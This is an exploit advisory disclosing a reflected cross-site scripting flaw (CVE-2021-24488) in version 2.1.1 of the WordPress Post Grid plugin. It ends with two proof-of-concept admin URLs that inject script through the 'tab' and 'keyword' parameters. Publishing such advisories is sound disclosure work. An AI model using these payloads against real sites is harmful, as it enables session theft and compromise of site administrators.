WordPress Post Grid plugin version 2.1.1 suffers from a cross site scripting vulnerability.
85628ff2b2ff802217eaad1f5710e2e8
# Exploit Title: WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
# Date: 3/16/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/post-grid/
# Version: 2.1.1
# Tested on: Windows 10
# CVE: CVE-2021-24488
1. Description:
This plugin creates a post grid from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script>
wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//